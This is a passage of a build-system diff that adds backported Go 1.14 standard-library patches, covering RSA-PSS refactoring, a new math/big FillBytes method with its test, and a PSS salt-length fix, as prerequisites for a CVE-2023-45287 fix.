++// emLen = dbLen + hLen + 1 = psLen + sLen + hLen + 2
++//
++
+ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byte, error) {
+- // See [1], section 9.1.1
++ // See RFC 8017, Section 9.1.1.
++
+ hLen := hash.Size()
+ sLen := len(salt)
+ emLen := (emBits + 7) / 8
+@@ -30,7 +42,7 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+
+ if len(mHash) != hLen {
+- return nil, errors.New("crypto/rsa: input must be hashed message")
++ return nil, errors.New("crypto/rsa: input must be hashed with given hash")
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "encoding error" and stop.
+@@ -40,8 +52,9 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ }
+
+ em := make([]byte, emLen)
+- db := em[:emLen-sLen-hLen-2+1+sLen]
+- h := em[emLen-sLen-hLen-2+1+sLen : emLen-1]
++ psLen := emLen - sLen - hLen - 2
++ db := em[:psLen+1+sLen]
++ h := em[psLen+1+sLen : emLen-1]
+
+ // 4. Generate a random octet string salt of length sLen; if sLen = 0,
+ // then salt is the empty string.
+@@ -69,8 +82,8 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 8. Let DB = PS || 0x01 || salt; DB is an octet string of length
+ // emLen - hLen - 1.
+
+- db[emLen-sLen-hLen-2] = 0x01
+- copy(db[emLen-sLen-hLen-1:], salt)
++ db[psLen] = 0x01
++ copy(db[psLen+1:], salt)
+
+ // 9. Let dbMask = MGF(H, emLen - hLen - 1).
+ //
+@@ -81,47 +94,57 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 11. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB to zero.
+
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= 0xff >> (8*emLen - emBits)
+
+ // 12. Let EM = maskedDB || H || 0xbc.
+- em[emLen-1] = 0xBC
++ em[emLen-1] = 0xbc
+
+ // 13. Output EM.
+ return em, nil
+ }
+
+ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
++ // See RFC 8017, Section 9.1.2.
++
++ hLen := hash.Size()
++ if sLen == PSSSaltLengthEqualsHash {
++ sLen = hLen
++ }
++ emLen := (emBits + 7) / 8
++ if emLen != len(em) {
++ return errors.New("rsa: internal error: inconsistent length")
++ }
++
+ // 1. If the length of M is greater than the input limitation for the
+ // hash function (2^61 - 1 octets for SHA-1), output "inconsistent"
+ // and stop.
+ //
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+- hLen := hash.Size()
+ if hLen != len(mHash) {
+ return ErrVerification
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "inconsistent" and stop.
+- emLen := (emBits + 7) / 8
+ if emLen < hLen+sLen+2 {
+ return ErrVerification
+ }
+
+ // 4. If the rightmost octet of EM does not have hexadecimal value
+ // 0xbc, output "inconsistent" and stop.
+- if em[len(em)-1] != 0xBC {
++ if em[emLen-1] != 0xbc {
+ return ErrVerification
+ }
+
+ // 5. Let maskedDB be the leftmost emLen - hLen - 1 octets of EM, and
+ // let H be the next hLen octets.
+ db := em[:emLen-hLen-1]
+- h := em[emLen-hLen-1 : len(em)-1]
++ h := em[emLen-hLen-1 : emLen-1]
+
+ // 6. If the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB are not all equal to zero, output "inconsistent" and
+ // stop.
+- if em[0]&(0xFF<<uint(8-(8*emLen-emBits))) != 0 {
++ var bitMask byte = 0xff >> (8*emLen - emBits)
++ if em[0] & ^bitMask != 0 {
+ return ErrVerification
+ }
+
+@@ -132,37 +155,30 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+
+ // 9. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in DB
+ // to zero.
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= bitMask
+
++ // If we don't know the salt length, look for the 0x01 delimiter.
+ if sLen == PSSSaltLengthAuto {
+- FindSaltLength:
+- for sLen = emLen - (hLen + 2); sLen >= 0; sLen-- {
+- switch db[emLen-hLen-sLen-2] {
+- case 1:
+- break FindSaltLength
+- case 0:
+- continue
+- default:
+- return ErrVerification
+- }
+- }
+- if sLen < 0 {
++ psLen := bytes.IndexByte(db, 0x01)
++ if psLen < 0 {
+ return ErrVerification
+ }
+- } else {
+- // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
+- // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
+- // position is "position 1") does not have hexadecimal value 0x01,
+- // output "inconsistent" and stop.
+- for _, e := range db[:emLen-hLen-sLen-2] {
+- if e != 0x00 {
+- return ErrVerification
+- }
+- }
+- if db[emLen-hLen-sLen-2] != 0x01 {
++ sLen = len(db) - psLen - 1
++ }
++
++ // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
++ // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
++ // position is "position 1") does not have hexadecimal value 0x01,
++ // output "inconsistent" and stop.
++ psLen := emLen - hLen - sLen - 2
++ for _, e := range db[:psLen] {
++ if e != 0x00 {
+ return ErrVerification
+ }
+ }
++ if db[psLen] != 0x01 {
++ return ErrVerification
++ }
+
+ // 11. Let salt be the last sLen octets of DB.
+ salt := db[len(db)-sLen:]
+@@ -181,19 +197,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ h0 := hash.Sum(nil)
+
+ // 14. If H = H', output "consistent." Otherwise, output "inconsistent."
+- if !bytes.Equal(h0, h) {
++ if !bytes.Equal(h0, h) { // TODO: constant time?
+ return ErrVerification
+ }
+ return nil
+ }
+
+-// signPSSWithSalt calculates the signature of hashed using PSS [1] with specified salt.
++// signPSSWithSalt calculates the signature of hashed using PSS with specified salt.
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
+- nBits := priv.N.BitLen()
+- em, err := emsaPSSEncode(hashed, nBits-1, salt, hash.New())
++ emBits := priv.N.BitLen() - 1
++ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return
+ }
+@@ -202,7 +218,7 @@ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed,
+ if err != nil {
+ return
+ }
+- s = make([]byte, (nBits+7)/8)
++ s = make([]byte, priv.Size())
+ copyWithLeftPad(s, c.Bytes())
+ return
+ }
+@@ -223,16 +239,15 @@ type PSSOptions struct {
+ // PSSSaltLength constants.
+ SaltLength int
+
+- // Hash, if not zero, overrides the hash function passed to SignPSS.
+- // This is the only way to specify the hash function when using the
+- // crypto.Signer interface.
++ // Hash is the hash function used to generate the message digest. If not
++ // zero, it overrides the hash function passed to SignPSS. It's required
++ // when using PrivateKey.Sign.
+ Hash crypto.Hash
+ }
+
+-// HashFunc returns pssOpts.Hash so that PSSOptions implements
+-// crypto.SignerOpts.
+-func (pssOpts *PSSOptions) HashFunc() crypto.Hash {
+- return pssOpts.Hash
++// HashFunc returns opts.Hash so that PSSOptions implements crypto.SignerOpts.
++func (opts *PSSOptions) HashFunc() crypto.Hash {
++ return opts.Hash
+ }
+
+ func (opts *PSSOptions) saltLength() int {
+@@ -242,56 +257,50 @@ func (opts *PSSOptions) saltLength() int {
+ return opts.SaltLength
+ }
+
+-// SignPSS calculates the signature of hashed using RSASSA-PSS [1].
+-// Note that hashed must be the result of hashing the input message using the
+-// given hash function. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []byte, opts *PSSOptions) ([]byte, error) {
++// SignPSS calculates the signature of digest using PSS.
++//
++// digest must be the result of hashing the input message using the given hash
++// function. The opts argument may be nil, in which case sensible defaults are
++// used. If opts.Hash is set, it overrides hash.
++func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte, opts *PSSOptions) ([]byte, error) {
++ if opts != nil && opts.Hash != 0 {
++ hash = opts.Hash
++ }
++
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()+7)/8 - 2 - hash.Size()
++ saltLength = priv.Size() - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+
+- if opts != nil && opts.Hash != 0 {
+- hash = opts.Hash
+- }
+-
+ salt := make([]byte, saltLength)
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, hashed, salt)
++ return signPSSWithSalt(rand, priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+-// hashed is the result of hashing the input message using the given hash
+-// function and sig is the signature. A valid signature is indicated by
+-// returning a nil error. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func VerifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, opts *PSSOptions) error {
+- return verifyPSS(pub, hash, hashed, sig, opts.saltLength())
+-}
+-
+-// verifyPSS verifies a PSS signature with the given salt length.
+-func verifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, saltLen int) error {
+- nBits := pub.N.BitLen()
+- if len(sig) != (nBits+7)/8 {
++//
++// A valid signature is indicated by returning a nil error. digest must be the
++// result of hashing the input message using the given hash function. The opts
++// argument may be nil, in which case sensible defaults are used. opts.Hash is
++// ignored.
++func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts *PSSOptions) error {
++ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+ s := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, s)
+- emBits := nBits - 1
++ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- if emLen < len(m.Bytes()) {
++ emBytes := m.Bytes()
++ if emLen < len(emBytes) {
+ return ErrVerification
+ }
+ em := make([]byte, emLen)
+- copyWithLeftPad(em, m.Bytes())
+- if saltLen == PSSSaltLengthEqualsHash {
+- saltLen = hash.Size()
+- }
+- return emsaPSSVerify(hashed, em, emBits, saltLen, hash.New())
++ copyWithLeftPad(em, emBytes)
++ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a42990640164..b4bfa13defbdf 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -2,7 +2,7 @@
+ // Use of this source code is governed by a BSD-style
+ // license that can be found in the LICENSE file.
+
+-// Package rsa implements RSA encryption as specified in PKCS#1.
++// Package rsa implements RSA encryption as specified in PKCS#1 and RFC 8017.
+ //
+ // RSA is a single, fundamental operation that is used in this package to
+ // implement either public-key encryption or public-key signatures.
+@@ -10,13 +10,13 @@
+ // The original specification for encryption and signatures with RSA is PKCS#1
+ // and the terms "RSA encryption" and "RSA signatures" by default refer to
+ // PKCS#1 version 1.5. However, that specification has flaws and new designs
+-// should use version two, usually called by just OAEP and PSS, where
++// should use version 2, usually called by just OAEP and PSS, where
+ // possible.
+ //
+ // Two sets of interfaces are included in this package. When a more abstract
+ // interface isn't necessary, there are functions for encrypting/decrypting
+ // with v1.5/OAEP and signing/verifying with v1.5/PSS. If one needs to abstract
+-// over the public-key primitive, the PrivateKey struct implements the
++// over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+ // The RSA operations in this package are not implemented using constant-time algorithms.
+@@ -111,7 +111,8 @@ func (priv *PrivateKey) Public() crypto.PublicKey {
+
+ // Sign signs digest with priv, reading randomness from rand. If opts is a
+ // *PSSOptions then the PSS algorithm will be used, otherwise PKCS#1 v1.5 will
+-// be used.
++// be used. digest must be the result of hashing the input message using
++// opts.HashFunc().
+ //
+ // This method implements crypto.Signer, which is an interface to support keys
+ // where the private part is kept in, for example, a hardware module. Common
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
new file mode 100644
index 0000000000..1327b44545
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
@@ -0,0 +1,401 @@
+From c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Mon, 27 Apr 2020 21:52:38 -0400
+Subject: [PATCH] math/big: add (*Int).FillBytes
+
+Replaced almost every use of Bytes with FillBytes.
+
+Note that the approved proposal was for
+
+ func (*Int) FillBytes(buf []byte)
+
+while this implements
+
+ func (*Int) FillBytes(buf []byte) []byte
+
+because the latter was far nicer to use in all callsites.
+
+Fixes #35833
+
+Change-Id: Ia912df123e5d79b763845312ea3d9a8051343c0a
+Reviewed-on: https://go-review.googlesource.com/c/go/+/230397
+Reviewed-by: Robert Griesemer <gri@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3]
+CVE: CVE-2023-45287 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/elliptic/elliptic.go | 13 ++++----
+ src/crypto/rsa/pkcs1v15.go | 20 +++---------
+ src/crypto/rsa/pss.go | 17 +++++------
+ src/crypto/rsa/rsa.go | 32 +++----------------
+ src/crypto/tls/key_schedule.go | 7 ++---
+ src/crypto/x509/sec1.go | 7 ++---
+ src/math/big/int.go | 15 +++++++++
+ src/math/big/int_test.go | 54 +++++++++++++++++++++++++++++++++
+ src/math/big/nat.go | 15 ++++++---
+ 9 files changed, 106 insertions(+), 74 deletions(-)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cdb63bab..bd5168c5fd842 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -277,7 +277,7 @@ var mask = []byte{0xff, 0x1, 0x3, 0x7, 0xf, 0x1f, 0x3f, 0x7f}
+ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err error) {
+ N := curve.Params().N
+ bitSize := N.BitLen()
+- byteLen := (bitSize + 7) >> 3
++ byteLen := (bitSize + 7) / 8
+ priv = make([]byte, byteLen)
+
+ for x == nil {
+@@ -304,15 +304,14 @@ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err e
+
+ // Marshal converts a point into the uncompressed form specified in section 4.3.6 of ANSI X9.62.
+ func Marshal(curve Curve, x, y *big.Int) []byte {
+- byteLen := (curve.Params().BitSize + 7) >> 3
++ byteLen := (curve.Params().BitSize + 7) / 8
+
+ ret := make([]byte, 1+2*byteLen)
+ ret[0] = 4 // uncompressed point
+
+- xBytes := x.Bytes()
+- copy(ret[1+byteLen-len(xBytes):], xBytes)
+- yBytes := y.Bytes()
+- copy(ret[1+2*byteLen-len(yBytes):], yBytes)
++ x.FillBytes(ret[1 : 1+byteLen])
++ y.FillBytes(ret[1+byteLen : 1+2*byteLen])
++
+ return ret
+ }
+
+@@ -320,7 +319,7 @@ func Marshal(curve Curve, x, y *big.Int) []byte {
+ // It is an error if the point is not in uncompressed form or is not on the curve.
+ // On error, x = nil.
+ func Unmarshal(curve Curve, data []byte) (x, y *big.Int) {
+- byteLen := (curve.Params().BitSize + 7) >> 3
++ byteLen := (curve.Params().BitSize + 7) / 8
+ if len(data) != 1+2*byteLen {
+ return
+ }
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index 499242ffc5b57..3208119ae1ff4 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -61,8 +61,7 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ m := new(big.Int).SetBytes(em)
+ c := encrypt(new(big.Int), pub, m)
+
+- copyWithLeftPad(em, c.Bytes())
+- return em, nil
++ return c.FillBytes(em), nil
+ }
+
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+@@ -150,7 +149,7 @@ func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid
+ return
+ }
+
+- em = leftPad(m.Bytes(), k)
++ em = m.FillBytes(make([]byte, k))
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+
+@@ -256,8 +255,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ return nil, err
+ }
+
+- copyWithLeftPad(em, c.Bytes())
+- return em, nil
++ return c.FillBytes(em), nil
+ }
+
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -286,7 +284,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+
+ c := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, c)
+- em := leftPad(m.Bytes(), k)
++ em := m.FillBytes(make([]byte, k))
+ // EM = 0x00 || 0x01 || PS || 0x00 || T
+
+ ok := subtle.ConstantTimeByteEq(em[0], 0)
+@@ -323,13 +321,3 @@ func pkcs1v15HashInfo(hash crypto.Hash, inLen int) (hashLen int, prefix []byte,
+ }
+ return
+ }
+-
+-// copyWithLeftPad copies src to the end of dest, padding with zero bytes as
+-// needed.
+-func copyWithLeftPad(dest, src []byte) {
+- numPaddingBytes := len(dest) - len(src)
+- for i := 0; i < numPaddingBytes; i++ {
+- dest[i] = 0
+- }
+- copy(dest[numPaddingBytes:], src)
+-}
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index f9844d87329a8..b2adbedb28fa8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -207,20 +207,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
++func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+ emBits := priv.N.BitLen() - 1
+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+- return
++ return nil, err
+ }
+ m := new(big.Int).SetBytes(em)
+ c, err := decryptAndCheck(rand, priv, m)
+ if err != nil {
+- return
++ return nil, err
+ }
+- s = make([]byte, priv.Size())
+- copyWithLeftPad(s, c.Bytes())
+- return
++ s := make([]byte, priv.Size())
++ return c.FillBytes(s), nil
+ }
+
+ const (
+@@ -296,11 +295,9 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ m := encrypt(new(big.Int), pub, s)
+ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- emBytes := m.Bytes()
+- if emLen < len(emBytes) {
++ if m.BitLen() > emLen*8 {
+ return ErrVerification
+ }
+- em := make([]byte, emLen)
+- copyWithLeftPad(em, emBytes)
++ em := m.FillBytes(make([]byte, emLen))
+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index b4bfa13defbdf..28eb5926c1a54 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -416,16 +416,9 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ m := new(big.Int)
+ m.SetBytes(em)
+ c := encrypt(new(big.Int), pub, m)
+- out := c.Bytes()
+
+- if len(out) < k {
+- // If the output is too small, we need to left-pad with zeros.
+- t := make([]byte, k)
+- copy(t[k-len(out):], out)
+- out = t
+- }
+-
+- return out, nil
++ out := make([]byte, k)
++ return c.FillBytes(out), nil
+ }
+
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -597,12 +590,9 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ lHash := hash.Sum(nil)
+ hash.Reset()
+
+- // Converting the plaintext number to bytes will strip any
+- // leading zeros so we may have to left pad. We do this unconditionally
+- // to avoid leaking timing information. (Although we still probably
+- // leak the number of leading zeros. It's not clear that we can do
+- // anything about this.)
+- em := leftPad(m.Bytes(), k)
++ // We probably leak the number of leading zeros.
++ // It's not clear that we can do anything about this.
++ em := m.FillBytes(make([]byte, k))
+
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+
+@@ -643,15 +633,3 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+
+ return rest[index+1:], nil
+ }
+-
+-// leftPad returns a new slice of length size. The contents of input are right
+-// aligned in the new slice.
+-func leftPad(input []byte, size int) (out []byte) {
+- n := len(input)
+- if n > size {
+- n = size
+- }
+- out = make([]byte, size)
+- copy(out[len(out)-n:], input)
+- return
+-}
+diff --git a/src/crypto/tls/key_schedule.go b/src/crypto/tls/key_schedule.go
+index 2aab323202f7d..314016979afb8 100644
+--- a/src/crypto/tls/key_schedule.go
++++ b/src/crypto/tls/key_schedule.go
+@@ -173,11 +173,8 @@ func (p *nistParameters) SharedKey(peerPublicKey []byte) []byte {
+ }
+
+ xShared, _ := curve.ScalarMult(x, y, p.privateKey)
+- sharedKey := make([]byte, (curve.Params().BitSize+7)>>3)
+- xBytes := xShared.Bytes()
+- copy(sharedKey[len(sharedKey)-len(xBytes):], xBytes)
+-
+- return sharedKey
++ sharedKey := make([]byte, (curve.Params().BitSize+7)/8)
++ return xShared.FillBytes(sharedKey)
+ }
+
+ type x25519Parameters struct {
+diff --git a/src/crypto/x509/sec1.go b/src/crypto/x509/sec1.go
+index 0bfb90cd5464a..52c108ff1d624 100644
+--- a/src/crypto/x509/sec1.go
++++ b/src/crypto/x509/sec1.go
+@@ -52,13 +52,10 @@ func MarshalECPrivateKey(key *ecdsa.PrivateKey) ([]byte, error) {
+ // marshalECPrivateKey marshals an EC private key into ASN.1, DER format and
+ // sets the curve ID to the given OID, or omits it if OID is nil.
+ func marshalECPrivateKeyWithOID(key *ecdsa.PrivateKey, oid asn1.ObjectIdentifier) ([]byte, error) {
+- privateKeyBytes := key.D.Bytes()
+- paddedPrivateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+- copy(paddedPrivateKey[len(paddedPrivateKey)-len(privateKeyBytes):], privateKeyBytes)
+-
++ privateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+ return asn1.Marshal(ecPrivateKey{
+ Version: 1,
+- PrivateKey: paddedPrivateKey,
++ PrivateKey: key.D.FillBytes(privateKey),
+ NamedCurveOID: oid,
+ PublicKey: asn1.BitString{Bytes: elliptic.Marshal(key.Curve, key.X, key.Y)},
+ })
+diff --git a/src/math/big/int.go b/src/math/big/int.go
+index 8816cf5266cc4..65f32487b58c0 100644
+--- a/src/math/big/int.go
++++ b/src/math/big/int.go
+@@ -447,11 +447,26 @@ func (z *Int) SetBytes(buf []byte) *Int {
+ }
+
+ // Bytes returns the absolute value of x as a big-endian byte slice.
++//
++// To use a fixed length slice, or a preallocated one, use FillBytes.
+ func (x *Int) Bytes() []byte {
+ buf := make([]byte, len(x.abs)*_S)
+ return buf[x.abs.bytes(buf):]
+ }
+
++// FillBytes sets buf to the absolute value of x, storing it as a zero-extended
++// big-endian byte slice, and returns buf.
++//
++// If the absolute value of x doesn't fit in buf, FillBytes will panic.
++func (x *Int) FillBytes(buf []byte) []byte {
++ // Clear whole buffer. (This gets optimized into a memclr.)
++ for i := range buf {
++ buf[i] = 0
++ }
++ x.abs.bytes(buf)
++ return buf
++}
++
+ // BitLen returns the length of the absolute value of x in bits.
+ // The bit length of 0 is 0.
+ func (x *Int) BitLen() int {
+diff --git a/src/math/big/int_test.go b/src/math/big/int_test.go
+index e3a1587b3f0ad..3c8557323a032 100644
+--- a/src/math/big/int_test.go
++++ b/src/math/big/int_test.go
+@@ -1840,3 +1840,57 @@ func BenchmarkDiv(b *testing.B) {
+ })
+ }
+ }
++
++func TestFillBytes(t *testing.T) {
++ checkResult := func(t *testing.T, buf []byte, want *Int) {
++ t.Helper()
++ got := new(Int).SetBytes(buf)
++ if got.CmpAbs(want) != 0 {
++ t.Errorf("got 0x%x, want 0x%x: %x", got, want, buf)
++ }
++ }
++ panics := func(f func()) (panic bool) {
++ defer func() { panic = recover() != nil }()
++ f()
++ return
++ }
++
++ for _, n := range []string{
++ "0",
++ "1000",
++ "0xffffffff",
++ "-0xffffffff",
++ "0xffffffffffffffff",
++ "0x10000000000000000",
++ "0xabababababababababababababababababababababababababa",
++ "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
++ } {
++ t.Run(n, func(t *testing.T) {
++ t.Logf(n)
++ x, ok := new(Int).SetString(n, 0)
++ if !ok {
++ panic("invalid test entry")
++ }
++
++ // Perfectly sized buffer.
++ byteLen := (x.BitLen() + 7) / 8
++ buf := make([]byte, byteLen)
++ checkResult(t, x.FillBytes(buf), x)
++
++ // Way larger, checking all bytes get zeroed.
++ buf = make([]byte, 100)
++ for i := range buf {
++ buf[i] = 0xff
++ }
++ checkResult(t, x.FillBytes(buf), x)
++
++ // Too small.
++ if byteLen > 0 {
++ buf = make([]byte, byteLen-1)
++ if !panics(func() { x.FillBytes(buf) }) {
++ t.Errorf("expected panic for small buffer and value %x", x)
++ }
++ }
++ })
++ }
++}
+diff --git a/src/math/big/nat.go b/src/math/big/nat.go
+index c31ec5156b81d..6a3989bf9d82b 100644
+--- a/src/math/big/nat.go
++++ b/src/math/big/nat.go
+@@ -1476,19 +1476,26 @@ func (z nat) expNNMontgomery(x, y, m nat) nat {
+ }
+
+ // bytes writes the value of z into buf using big-endian encoding.
+-// len(buf) must be >= len(z)*_S. The value of z is encoded in the
+-// slice buf[i:]. The number i of unused bytes at the beginning of
+-// buf is returned as result.
++// The value of z is encoded in the slice buf[i:]. If the value of z
++// cannot be represented in buf, bytes panics. The number i of unused
++// bytes at the beginning of buf is returned as result.
+ func (z nat) bytes(buf []byte) (i int) {
+ i = len(buf)
+ for _, d := range z {
+ for j := 0; j < _S; j++ {
+ i--
+- buf[i] = byte(d)
++ if i >= 0 {
++ buf[i] = byte(d)
++ } else if byte(d) != 0 {
++ panic("math/big: buffer too small to fit value")
++ }
+ d >>= 8
+ }
+ }
+
++ if i < 0 {
++ i = 0
++ }
+ for i < len(buf) && buf[i] == 0 {
+ i++
+ }
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
new file mode 100644
index 0000000000..ae9fcc170c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
@@ -0,0 +1,86 @@
+From 8f676144ad7b7c91adb0c6e1ec89aaa6283c6807 Mon Sep 17 00:00:00 2001
+From: Himanshu Kishna Srivastava <28himanshu@gmail.com>
+Date: Tue, 16 Mar 2021 22:37:46 +0530
+Subject: [PATCH] crypto/rsa: fix salt length calculation with
+ PSSSaltLengthAuto
+
+When PSSSaltLength is set, the maximum salt length must equal:
+
+ (modulus_key_size - 1 + 7)/8 - hash_length - 2
+and for example, with a 4096 bit modulus key, and a SHA-1 hash,
+it should be:
+
+ (4096 -1 + 7)/8 - 20 - 2 = 490
+Previously we'd encounter this error:
+
+ crypto/rsa: key size too small for PSS signature
+
+Fixes #42741
+
+Change-Id: I18bb82c41c511d564b3f4c443f4b3a38ab010ac5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/302230
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Trust: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8f676144ad7b7c91adb0c6e1ec89aaa6283c6807]
+CVE: CVE-2023-45287 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 2 +-
+ src/crypto/rsa/pss_test.go | 20 +++++++++++++++++++-
+ 2 files changed, 20 insertions(+), 2 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index b2adbedb28fa8..814522de8181f 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -269,7 +269,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = priv.Size() - 2 - hash.Size()
++ saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index dfa8d8bb5ad02..c3a6d468497cd 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
